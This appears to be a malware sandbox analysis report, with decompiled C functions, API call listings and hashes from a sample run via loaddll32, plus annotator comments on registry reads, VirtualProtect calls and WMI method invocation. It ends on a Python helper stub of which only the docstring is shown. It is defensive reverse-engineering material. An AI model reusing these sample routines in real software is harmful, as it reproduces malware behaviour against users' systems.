                                                  • StrChrA.SHLWAPI(?,00000020,00000000,030095AC,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94C3
                                                  • StrTrimA.KERNELBASE(?,00ECC2A4,00000002,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94ED
                                                  • StrTrimA.SHLWAPI(00000001,00ECC2A4,?,00EC23DE,?,00EC7634,030095AC,?,00EC23DE), ref: 00EC94FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: 5d7d5aa4f51e8fb77214fcde4ce73fe825bb8af4f681f3571aefdb9902f0f108
                                                  • Instruction ID: bdaba0d1e356e5eb108bc9451cc7017f53db8bdddca5590f5e8d71455f41ca83
                                                  • Opcode Fuzzy Hash: 5d7d5aa4f51e8fb77214fcde4ce73fe825bb8af4f681f3571aefdb9902f0f108
                                                  • Instruction Fuzzy Hash: EA01F5716053155FC2318F6ACD4DF27BA98FB86754F11252CF855E7251DB63CC0382A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E0040111A(void* __ecx, char _a4) {
                                                  				long _t3;
                                                  				int _t4;
                                                  				int _t9;
                                                  				void* _t13;
                                                  
                                                  				_t13 = GetCurrentThread();
                                                  				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                  				if(_t3 != 0) {
                                                  					SetThreadPriority(_t13, 0xffffffff); // executed
                                                  				}
                                                  				_t4 = E0040163F(_a4); // executed
                                                  				_t9 = _t4;
                                                  				if(_t9 == 0) {
                                                  					SetThreadPriority(_t13, _t4);
                                                  				}
                                                  				asm("lock xadd [eax], ecx");
                                                  				return _t9;
                                                  			}

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 0040111D
                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401128
                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 0040113B
                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 0040114E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1452675757-0
                                                  • Opcode ID: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                  • Instruction ID: 67fa18b92f8a63c61967de09933370e0a35cc4576ff87cf796d34e9f8e5d67a8
                                                  • Opcode Fuzzy Hash: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                  • Instruction Fuzzy Hash: 01E092712062106BE3117B295C85E6B6B5CDF95331B014236F620F62F0CB798D0286AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC73FD(void* __edx) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				WCHAR* _v16;
                                                  				void* __esi;
                                                  				void* _t23;
                                                  				intOrPtr _t24;
                                                  				void* _t26;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t38;
                                                  				void* _t40;
                                                  				intOrPtr _t42;
                                                  				void* _t45;
                                                  				void* _t50;
                                                  				void* _t55;
                                                  
                                                  				_t50 = __edx;
                                                  				_v12 = 0;
                                                  				_t23 = E00ECA72D(0,  &_v8); // executed
                                                  				if(_t23 != 0) {
                                                  					_v8 = 0;
                                                  				}
                                                  				_t24 =  *0xecd27c; // 0x213a5a8
                                                  				_t4 = _t24 + 0xecede0; // 0x3009388
                                                  				_t5 = _t24 + 0xeced88; // 0x4f0053
                                                  				_t26 = E00EC1262( &_v16, _v8, _t5, _t4); // executed
                                                  				_t45 = _t26;
                                                  				if(_t45 == 0) {
                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                  					_t45 = 8;
                                                  					if(_v12 < _t45) {
                                                  						_t45 = 1;
                                                  						__eflags = 1;
                                                  					} else {
                                                  						_t32 =  *0xecd27c; // 0x213a5a8
                                                  						_t11 = _t32 + 0xecedd4; // 0x300937c
                                                  						_t48 = _t11;
                                                  						_t12 = _t32 + 0xeced88; // 0x4f0053
                                                  						_t55 = E00EC7CB8(_t11, _t12, _t11);
                                                  						_t59 = _t55;
                                                  						if(_t55 != 0) {
                                                  							_t35 =  *0xecd27c; // 0x213a5a8
                                                  							_t13 = _t35 + 0xecee1e; // 0x30314549
                                                  							if(E00EC89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                  								_t61 =  *0xecd25c - 6;
                                                  								if( *0xecd25c <= 6) {
                                                  									_t42 =  *0xecd27c; // 0x213a5a8
                                                  									_t15 = _t42 + 0xecec2a; // 0x52384549
                                                  									E00EC89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                  								}
                                                  							}
                                                  							_t38 =  *0xecd27c; // 0x213a5a8
                                                  							_t17 = _t38 + 0xecee18; // 0x30093c0
                                                  							_t18 = _t38 + 0xecedf0; // 0x680043
                                                  							_t40 = E00EC2659(_v8, 0x80000001, _t55, _t18, _t17); // executed
                                                  							_t45 = _t40;
                                                  							HeapFree( *0xecd238, 0, _t55);
                                                  						}
                                                  					}
                                                  					HeapFree( *0xecd238, 0, _v16);
                                                  				}
                                                  				_t54 = _v8;
                                                  				if(_v8 != 0) {
                                                  					E00EC1F99(_t54);
                                                  				}
                                                  				return _t45;
                                                  			}

                                                  APIs
                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03009388,00000000,?,7519F710,00000000,7519F730), ref: 00EC744C
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,030093C0,?,00000000,30314549,00000014,004F0053,0300937C), ref: 00EC74E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00EC6814), ref: 00EC74FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: b60539aa95274b286c4b08d3fe624e07c8379ff1036a006b70403ac2c86facfa
                                                  • Instruction ID: 6929149a5b65e2825f89b4413f7ec2f0f6e4023ef93f72502c36f1d410504eeb
                                                  • Opcode Fuzzy Hash: b60539aa95274b286c4b08d3fe624e07c8379ff1036a006b70403ac2c86facfa
                                                  • Instruction Fuzzy Hash: 8131AF71904108AFDB25DBA1DE85EAA7BECEB44314F2500BAB511B7231D3739E0BDB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E00401179(void* __eax, void* _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				long _v20;
                                                  				int _t43;
                                                  				long _t54;
                                                  				signed int _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t57 =  *0x40414c;
                                                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                  				_v8 = _v8 & 0x00000000;
                                                  				if(_v16 <= 0) {
                                                  					L12:
                                                  					return _v12;
                                                  				} else {
                                                  					goto L1;
                                                  				}
                                                  				while(1) {
                                                  					L1:
                                                  					_t60 = _v12;
                                                  					if(_t60 != 0) {
                                                  						goto L12;
                                                  					}
                                                  					asm("bt [esi+0x24], eax");
                                                  					if(_t60 >= 0) {
                                                  						asm("bt [esi+0x24], eax");
                                                  						if(__eflags >= 0) {
                                                  							L8:
                                                  							_t54 = _t57 - 0x63699bbf;
                                                  							L9:
                                                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                  							if(_t43 == 0) {
                                                  								_v12 = GetLastError();
                                                  							}
                                                  							_v8 = _v8 + 1;
                                                  							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                  							if(_v8 < _v16) {
                                                  								continue;
                                                  							} else {
                                                  								goto L12;
                                                  							}
                                                  						}
                                                  						asm("bt [esi+0x24], eax");
                                                  						_t54 = _t57 - 0x63699bc1;
                                                  						if(__eflags >= 0) {
                                                  							goto L9;
                                                  						}
                                                  						goto L8;
                                                  					}
                                                  					asm("bt [esi+0x24], eax");
                                                  					if(_t60 >= 0) {
                                                  						_t54 = _t57 - 0x63699ba3;
                                                  					} else {
                                                  						_t54 = _t57 - 0x63699b83;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                  • GetLastError.KERNEL32 ref: 0040122D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1469625949-0
                                                  • Opcode ID: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                  • Instruction ID: e0497764a4c06b5612b956a562527d162aa7cc70331ed511b9c3235716ceee51
                                                  • Opcode Fuzzy Hash: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                  • Instruction Fuzzy Hash: 21217131801206EFCB14DF95C985AAAF7F5FF58319F0048AED102B7594E37CA695CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00ECA66E(void* __edx, void* __edi, void* _a4) {
                                                  				int _t7;
                                                  				int _t13;
                                                  
                                                  				_t1 =  &_a4; // 0xec685f
                                                  				_t2 =  &_a4; // 0xec685f
                                                  				_t7 = E00EC7323(__edx, __edi,  *_t2, _t1); // executed
                                                  				_t13 = _t7;
                                                  				if(_t13 != 0) {
                                                  					memcpy(__edi, _a4, _t13);
                                                  					 *((char*)(__edi + _t13)) = 0;
                                                  					E00EC9039(_a4);
                                                  				}
                                                  				return _t13;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC7323: memcpy.NTDLL(00000000,00000090,00000002,00000002,_h,00000008,_h,_h,?,00EC858C,_h), ref: 00EC7359
                                                    • Part of subcall function 00EC7323: memset.NTDLL ref: 00EC73CF
                                                    • Part of subcall function 00EC7323: memset.NTDLL ref: 00EC73E3
                                                  • memcpy.NTDLL(00000002,?,00000000,00000002,_h,_h,_h,?,00EC858C,_h,?,00EC685F,00000002,?,?,00EC2417), ref: 00ECA68A
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset$FreeHeap
                                                  • String ID: _h$_h
                                                  • API String ID: 3053036209-1171608278
                                                  • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction ID: 6f600978687e6242bb8ce96b25ddb4f4b16d4c30d3b49cc84a0b7432b4b7d247
                                                  • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction Fuzzy Hash: 6DE08633404628B6C7122A94DD01FFF7FAD9F41790F045029FE4869202D623D95197E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                   			// Strings in this module are addressed as *0xecd27c + offset, i.e. relative to a relocated
                                                   			// string table; the constants the decompiler prints beside those lines are the first bytes
                                                   			// of the referenced string. The comments below read those constants and the API listing
                                                   			// that follows this function; they are editorial annotations, not decompiler output.
                                                   			E00EC3DD9(void* __eflags, int _a4) {
                                                   				intOrPtr _v12;
                                                   				WCHAR* _v16;
                                                   				char* _v20;
                                                   				int _v24;
                                                   				void* _v36;
                                                   				char _v40;
                                                   				char _v68;
                                                   				char _v72;
                                                   				char _v76;
                                                   				char _v80;
                                                   				void _v84;
                                                   				char _v88;
                                                   				void* __ebx;
                                                   				void* __esi;
                                                   				intOrPtr _t40;
                                                   				int _t45;
                                                   				intOrPtr _t50;
                                                   				intOrPtr _t52;
                                                   				void* _t55;
                                                   				intOrPtr _t67;
                                                   				void* _t70;
                                                   				void* _t80;
                                                   				WCHAR* _t85;
                                                   
                                                   				// Zero the locals: the 0x2c-byte block at _v84 and five dwords starting at _v40.
                                                   				_v88 = 0;
                                                   				memset( &_v84, 0, 0x2c);
                                                   				_v40 = 0;
                                                   				asm("stosd");
                                                   				asm("stosd");
                                                   				asm("stosd");
                                                   				asm("stosd");
                                                   				asm("stosd");
                                                   				// 0x410025 is UTF-16 "%A", the start of an environment-variable pattern that E00EC6A12
                                                   				// expands (ExpandEnvironmentStringsW in the API listing below) into a heap string.
                                                   				_t40 =  *0xecd27c; // 0x213a5a8
                                                   				_t5 = _t40 + 0xecee40; // 0x410025
                                                   				_t85 = E00EC6A12(_t5);
                                                   				_v16 = _t85;
                                                   				if(_t85 == 0) {
                                                   					_t80 = 8; // failure code returned whenever a lookup or allocation fails
                                                   					L24:
                                                   					return _t80;
                                                   				}
                                                   				// Case-insensitive prefix test: does the caller's path _a4 begin with the expanded string?
                                                   				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                   				if(_t45 != 0) {
                                                   					_t80 = 1; // prefix mismatch: nothing to do
                                                   					L22:
                                                   					E00EC9039(_v16); // release the expanded string (HeapFree, per the E00EC9039 subcall listing above)
                                                   					goto L24;
                                                   				}
                                                   				if(E00ECA72D(0,  &_a4) != 0) {
                                                   					_a4 = 0;
                                                   				}
                                                   				// E00EC809F resolves a string-table entry into a heap buffer; every result is later freed with E00EC9039.
                                                   				_t50 = E00EC809F(0,  *0xecd33c);
                                                   				_v12 = _t50;
                                                   				if(_t50 == 0) {
                                                   					_t80 = 8;
                                                   					goto L19;
                                                   				} else {
                                                   					// 0x65696c43 is ASCII "Clie" (little-endian); the entries at +0xece81a and +0xece823 share that prefix.
                                                   					_t52 =  *0xecd27c; // 0x213a5a8
                                                   					_t11 = _t52 + 0xece81a; // 0x65696c43
                                                   					_t55 = E00EC809F(0, _t11);
                                                   					_t87 = _t55;
                                                   					if(_t55 == 0) {
                                                   						_t80 = 8;
                                                   					} else {
                                                   						// 0x80000001 == HKEY_CURRENT_USER. The key path is _v12, the value name _t87; the two
                                                   						// outputs land in _v88 (a heap buffer, freed below with E00EC9039) and _v84.
                                                   						_t80 = E00EC6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                   						E00EC9039(_t87);
                                                   					}
                                                   					if(_t80 != 0) {
                                                   						L17:
                                                   						E00EC9039(_v12);
                                                   						L19:
                                                   						_t86 = _a4;
                                                   						if(_a4 != 0) {
                                                   							E00EC1F99(_t86);
                                                   						}
                                                   						goto L22;
                                                   					} else {
                                                   						// Bit 0 of the global at 0xecd260 decides whether a second value (+0xece823) is read first.
                                                   						if(( *0xecd260 & 0x00000001) == 0) {
                                                   							L14:
                                                   							// Post-process the registry data (E00EC8F83), parse it (E00EC1C74) and hand it on via E00EC42EA.
                                                   							E00EC8F83(_t80, _v88, _v84,  *0xecd270, 0);
                                                   							_t80 = E00EC1C74(_v88,  &_v80,  &_v76, 0);
                                                   							if(_t80 == 0) {
                                                   								_v24 = _a4;
                                                   								_v20 =  &_v88;
                                                   								_t80 = E00EC42EA( &_v40, 0);
                                                   							}
                                                   							E00EC9039(_v88);
                                                   							goto L17;
                                                   						}
                                                   						_t67 =  *0xecd27c; // 0x213a5a8
                                                   						_t18 = _t67 + 0xece823; // 0x65696c43
                                                   						_t70 = E00EC809F(0, _t18);
                                                   						_t89 = _t70;
                                                   						if(_t70 == 0) {
                                                   							_t80 = 8;
                                                   						} else {
                                                   							// Same HKCU read as above, into (_v72, _v68).
                                                   							_t80 = E00EC6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                   							E00EC9039(_t89);
                                                   						}
                                                   						if(_t80 != 0) {
                                                   							goto L17;
                                                   						} else {
                                                   							goto L14;
                                                   						}
                                                   					}
                                                   				}
                                                   			}

                                                   Statement addresses for E00EC3DD9 (listed in the order of the C statements above; 0x00000000 marks a statement with no instruction of its own, such as a goto):
                                                   0x00ec3deb, 0x00ec3dee, 0x00ec3df5, 0x00ec3dfb, 0x00ec3dfc, 0x00ec3dfd, 0x00ec3dfe, 0x00ec3dff, 0x00ec3e00, 0x00ec3e08,
                                                   0x00ec3e14, 0x00ec3e18, 0x00ec3e1b, 0x00ec3f6b, 0x00ec3f6e, 0x00ec3f72, 0x00ec3f72, 0x00ec3e2d, 0x00ec3e35, 0x00ec3f5e,
                                                   0x00ec3f5f, 0x00ec3f62, 0x00000000, 0x00ec3f62, 0x00ec3e47, 0x00ec3e49, 0x00ec3e49, 0x00ec3e54, 0x00ec3e5b, 0x00ec3e5e,
                                                   0x00ec3f4d, 0x00000000, 0x00ec3e64, 0x00ec3e64, 0x00ec3e69, 0x00ec3e72, 0x00ec3e77, 0x00ec3e80, 0x00ec3ea3, 0x00ec3e82,
                                                   0x00ec3e98, 0x00ec3e9a, 0x00ec3e9a, 0x00ec3ea6, 0x00ec3f41, 0x00ec3f44, 0x00ec3f4e, 0x00ec3f4e, 0x00ec3f53, 0x00ec3f55,
                                                   0x00ec3f55, 0x00000000, 0x00ec3eac, 0x00ec3eb3, 0x00ec3ef4, 0x00ec3f05, 0x00ec3f1b, 0x00ec3f1f, 0x00ec3f24, 0x00ec3f2a,
                                                   0x00ec3f37, 0x00ec3f37, 0x00ec3f3c, 0x00000000, 0x00ec3f3c, 0x00ec3eb5, 0x00ec3eba, 0x00ec3ec3, 0x00ec3ec8, 0x00ec3ecc,
                                                   0x00ec3eef, 0x00ec3ece, 0x00ec3ee4, 0x00ec3ee6, 0x00ec3ee6, 0x00ec3ef2, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
                                                   0x00ec3ef2, 0x00ec3ea6

                                                  APIs
                                                  • memset.NTDLL ref: 00EC3DEE
                                                    • Part of subcall function 00EC6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00EC3E14,00410025,00000005,?,00000000), ref: 00EC6A23
                                                    • Part of subcall function 00EC6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00EC6A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00EC3E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00EC3E2D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                   • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: d91cd82cd713eb0b95d699b30c93a78270e2dfb06910d21f9164972f50a84ec1
                                                  • Instruction ID: 04eecbe9f253c59500fed232a0ed5651ea6f6317a518692501bcc94f07549cfd
                                                  • Opcode Fuzzy Hash: d91cd82cd713eb0b95d699b30c93a78270e2dfb06910d21f9164972f50a84ec1
                                                  • Instruction Fuzzy Hash: 0E415071A01218AEDB11AFF5CE85EEE7BBCAF08344B14953EB901F6111D6739E0A8790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                   			// _a4 points at a pair of COM interface pointers: *_a4 is called through a 7-argument slot
                                                   			// at +0x60 and *(_a4+4) through a 4-argument slot at +0x4c. Read against the WMI vtable
                                                   			// layouts in wbemcli.h those are IWbemServices::ExecMethod and IWbemClassObject::GetMethod,
                                                   			// and the remaining slots fit the same reading. The method names in the comments below are
                                                   			// that interpretation (consistent with the report's "registry via WMI" signatures), not
                                                   			// decompiler output; the trailing register operands on the first call are decompiler noise.
                                                   			E00EC9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                   				void* _v8;
                                                   				void* __esi;
                                                   				intOrPtr* _t35;
                                                   				void* _t40;
                                                   				intOrPtr* _t41;
                                                   				intOrPtr* _t43;
                                                   				intOrPtr* _t45;
                                                   				intOrPtr* _t50;
                                                   				intOrPtr* _t52;
                                                   				void* _t54;
                                                   				intOrPtr* _t55;
                                                   				intOrPtr* _t57;
                                                   				intOrPtr* _t61;
                                                   				intOrPtr* _t65;
                                                   				intOrPtr _t68;
                                                   				void* _t72;
                                                   				void* _t75;
                                                   				void* _t76;
                                                   
                                                   				_t55 = _a4;
                                                   				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                   				_a4 = 0;
                                                   				// vtable +0x4c, 4 args: IWbemClassObject::GetMethod(_a16, 0, &_v8, NULL) on the class object;
                                                   				// _v8 receives the method's in-parameters object.
                                                   				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                   				if(_t76 < 0) {
                                                   					L18:
                                                   					return _t76;
                                                   				}
                                                   				// Fill the in-parameters object; this subcall allocates the BSTRs (SysAllocString in the
                                                   				// API listing below) that are released at the end of this function.
                                                   				_t40 = E00EC3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                   				_t76 = _t40;
                                                   				if(_t76 >= 0) {
                                                   					_t61 = _a28;
                                                   					if(_t61 != 0 &&  *_t61 != 0) {
                                                   						// vtable +0x14, 4 args: IWbemClassObject::Put(_a24, 0, _t61, 0): optional extra input parameter.
                                                   						_t52 = _v8;
                                                   						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                   					}
                                                   					if(_t76 >= 0) {
                                                   						_t43 =  *_t55;
                                                   						// 0x740053 is UTF-16 "St", the first two characters of the object path string at +0xece1fc.
                                                   						_t68 =  *0xecd27c; // 0x213a5a8
                                                   						_t20 = _t68 + 0xece1fc; // 0x740053
                                                   						// vtable +0x60, 7 args: IWbemServices::ExecMethod(objectPath=_t20, methodName=_a16, 0, NULL,
                                                   						// inParams=_v8, outParams=&_a4, NULL).
                                                   						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                   						if(_t76 >= 0) {
                                                   							_t76 = E00EC7C14(_a4); // inspect the out-parameters object
                                                   							if(_t76 >= 0) {
                                                   								_t65 = _a28;
                                                   								if(_t65 != 0 &&  *_t65 == 0) {
                                                   									// vtable +0x10, 5 args: IWbemClassObject::Get(_a24, 0, _t65, NULL, NULL): read one output parameter.
                                                   									_t50 = _a4;
                                                   									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                   								}
                                                   							}
                                                   						}
                                                   						_t45 = _a4;
                                                   						if(_t45 != 0) {
                                                   							 *((intOrPtr*)( *_t45 + 8))(_t45); // IUnknown::Release on the out-parameters object
                                                   						}
                                                   						// OLEAUT32 ordinal 6 is SysFreeString (the two SysFreeString calls in the API listing below).
                                                   						_t57 = __imp__#6;
                                                   						if(_a20 != 0) {
                                                   							 *_t57(_a20);
                                                   						}
                                                   						if(_a12 != 0) {
                                                   							 *_t57(_a12);
                                                   						}
                                                   					}
                                                   				}
                                                   				_t41 = _v8;
                                                   				 *((intOrPtr*)( *_t41 + 8))(_t41); // IUnknown::Release on the in-parameters object
                                                   				goto L18;
                                                   			}

                                                   Statement addresses for E00EC9152 (listed in the order of the C statements above; 0x00000000 marks a statement with no instruction of its own):
                                                   0x00ec9158, 0x00ec915b, 0x00ec916b, 0x00ec9174, 0x00ec9178, 0x00ec9246, 0x00ec924c, 0x00ec924c, 0x00ec9192, 0x00ec9197,
                                                   0x00ec919b, 0x00ec91a1, 0x00ec91a6, 0x00ec91ad, 0x00ec91bc, 0x00ec91bc, 0x00ec91c0, 0x00ec91c2, 0x00ec91ce, 0x00ec91d9,
                                                   0x00ec91e4, 0x00ec91e8, 0x00ec91f2, 0x00ec91f6, 0x00ec91f8, 0x00ec91fd, 0x00ec9204, 0x00ec9214, 0x00ec9214, 0x00ec91fd,
                                                   0x00ec91f6, 0x00ec9216, 0x00ec921b, 0x00ec9220, 0x00ec9220, 0x00ec9226, 0x00ec922c, 0x00ec9231, 0x00ec9231, 0x00ec9236,
                                                   0x00ec923b, 0x00ec923b, 0x00ec9236, 0x00ec91c0, 0x00ec923d, 0x00ec9243, 0x00000000

                                                  APIs
                                                    • Part of subcall function 00EC3AEF: SysAllocString.OLEAUT32(80000002), ref: 00EC3B46
                                                    • Part of subcall function 00EC3AEF: SysFreeString.OLEAUT32(00000000), ref: 00EC3BAB
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC9231
                                                  • SysFreeString.OLEAUT32(00EC1885), ref: 00EC923B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                   • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 0de84182f6db0f151a75aea4036ddf8b7e905395c6b4425033037d1950140182
                                                  • Instruction ID: 635fb2be07ec2026dd11456b085abac0a77aea222359f656bb1b315b251a026c
                                                  • Opcode Fuzzy Hash: 0de84182f6db0f151a75aea4036ddf8b7e905395c6b4425033037d1950140182
                                                  • Instruction Fuzzy Hash: 52319A72900108BFCB14DFA5D988C9BBBBAFFC97407154658F805AB221E2329D52CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
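The indirect calls in E00EC9152 can be checked against the WMI interface layouts rather than taken on faith. The helper below is an added example for this report, not code from the sample or from Joe Sandbox: it transcribes the IWbemClassObject and IWbemServices vtables from wbemcli.h (slot order and parameter counts are my reading of that header) and resolves each (vtable offset, argument count) pair seen in the decompiled function to the candidate methods. The receiver labels are the decompiler's variable names from the listing above.

```python
"""Resolve 32-bit COM vtable offsets from decompiled code to WMI interface methods.

Tables transcribed from wbemcli.h: slots in declaration order, arity = number of
parameters excluding the implicit `this`. IUnknown occupies the first three slots."""

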